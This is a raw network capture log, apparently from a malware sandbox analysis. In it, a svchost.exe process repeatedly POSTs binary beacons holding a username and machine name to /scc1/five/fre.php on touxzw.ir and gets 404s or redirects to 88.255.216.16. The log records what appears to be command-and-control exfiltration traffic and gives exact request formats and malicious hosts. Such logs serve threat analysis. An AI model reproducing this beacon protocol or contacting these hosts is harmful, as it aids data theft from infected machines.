Feb 25, 2025 15:37:41.899055004 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:42.673965931 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FjOZsfkIbbfbNuJCH9kpVIctW3RXQMv1iRsaH0qcEs1DtT7To6J%2BoPSACaqzp1MwHe%2BvOTxc2FkAmis%2BE3WRHiUq9rUm0nB6vY1ThB3nmybZm7q28U0FqwmUEzk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f535e9d7ce2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1934&rtt_var=967&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49886	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:43.828835964 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:43.834928036 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:44.600754023 CET	841	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8m%2Fhv1JyDhMOpIN9hF7MSM8vkBHV7WkVVkD92qV0G2DdSVKFQp7%2FNdcpLYHpMDXd0DTK87D2nwpW1J5Inw9tJDZ04w1FXuTshj2ZjvNegooquEEISbXOpz8yU9k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f5f8a304314-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2459&min_rtt=2459&rtt_var=1229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49900	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:45.762209892 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:45.768346071 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:46.548482895 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9VoSaVSPP5VHVj7W1yKuW8Ov1Arf5e4ERq40IPSHV0AChXsUHm%2B5ttDGdXfwpi%2FhnwGMOcLuwEsuaIIfsTcHMVq6w0Ka71SRl32p6IMvI5428fp3jbXOQB5uMo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f6b8b8bc459-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49912	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:47.698426962 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:47.703387022 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:48.491942883 CET	838	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2qgVIi2oHVf3DvLEyjYhC4743qdTtEQ3u0edzmL08R8v4zplKM7Qh480c4EWzBU3G69LvY1D61L2YmeGG9umnqvRUplDB%2FmUZpGzTj3QFFMqGxk2rVisVTll4w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f77ae660f74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49927	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:49.652782917 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:49.658365011 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:50.278114080 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVOOXS%2FjdRngstK0e1Lv%2BQJlqAb6c12wU9OujW%2B0TBUB9uVSK%2FVMEb13pd5V5eS4M6tXZjA7UZ2GCGBbnKyA1HY6KV4Ay7mP3KVenXjGa4RiVcvYXEaIGfpD%2BiI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f83dc90334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49938	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:51.465423107 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:51.470382929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:52.092005968 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnWn185D5e6l3SZ0EaMhtS6RU5u7U6UP%2FqIC9UoZuDkLaqcfNLbmozsbhI9JKlxY3PzKts%2BrhXRhS2dn5BASIBMoqjJBFggt2wE1WIfMeotwljlziwKMCuMSve4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f8f2fab43f1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49951	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:53.247513056 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:53.252480984 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:54.032346964 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4IxxRE8a2e7%2Bi33wT%2B%2B7wMIpD2ESpabixS2fkvBce8NWp9bzHbLoEHW9Itzw0GPKvo%2F6CW2Yb%2BFHAw7J1DevY6x4lRJ3rxBThJ4WmOCwwKbYlwXT5DxuSEALLA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f9a4f0d41ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1587&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49966	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:55.183506966 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:55.190339088 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:55.982541084 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=haZ09tag2Sdbq3tCpLHnGehgHu%2FZ8ib8bt%2ByImdVZ%2BApM1Ml%2Bk7s3qraAUjXb1bHMS41Slm6z4nd0dw%2FpFFKP1W2D2X6eWQE3kjKjHYN%2BrNrj5UpsYPiSO3EtbM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fa668344301-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49981	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:57.141136885 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:57.146054983 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:57.885996103 CET	821	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:57 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXUzW2COOtqAWk8nfqqeK820K7A9OTUTzK2sV%2FGpunVctTGlBEYT7b%2Bsg25y3ThTvCfjkTUpLAXcoIEfU98vYnq%2Fngh5utOgqt1BcJq10k1%2Fl6gPgCWkNei7ED0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fb2ad7dc35e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1521&rtt_var=760&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=93&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49993	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:59.047686100 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:59.054565907 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:59.770098925 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:59 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Irx2j3jGlb6dKLKcwvKFMc6gQ4EVIKEPssE%2FqJ%2BTF8cdCP1Zo2QXSNBASPAOUyLNcn%2BJuX3uHRES7b01rxJByieaJkwL%2Fqmifm4GjuqkeqpibU5AVWhHtaSl09M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fbe8a9b7c8d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1945&rtt_var=972&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50004	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:00.918661118 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:00.923981905 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:01.586658955 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYr7bprbfCEYPbZu0NY%2FnWvr9sublDSflxH5SHfSGQH4hCmUkLkz97y6Jn8bgJfSZdJjylwjR1aANwVos2dPKPOziMh1KEn5rd9u7%2FHJohIMoNN5a%2Fg%2Bmlqy3sg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fca6e708cb9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2076&min_rtt=2076&rtt_var=1038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50007	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:03.124989033 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:03.129955053 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:03.857400894 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:03 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFDvRFUHef2Tnu5yAJKvhrOXkkG%2FBzzFMMkAiERSY3AviRgZGBPoK0YeOyeuKjLC6StoEsbPxB%2Bg798tB2bY84%2B81b2ed1522wmXaCPL6B0PaVfmOe3P6zVYZ5s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fd80c741795-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50008	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:05.013072968 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:05.018827915 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:05.746911049 CET	834	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:05 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OoyIhrtwFqWMgmVpLuE1Rrh4CnhtLd%2BS8%2B3%2BpeByP3t%2FgxMP8VxwGYK%2FhJnuv567gLs2Oo%2FArdql4C3UUpmOW8TzPNJUj%2FK%2B6VZtU3CvFwB%2BMQqGqn%2FbpJcTxs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fe3d83543dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1701&rtt_var=850&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50009	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:06.932481050 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:06.937484026 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
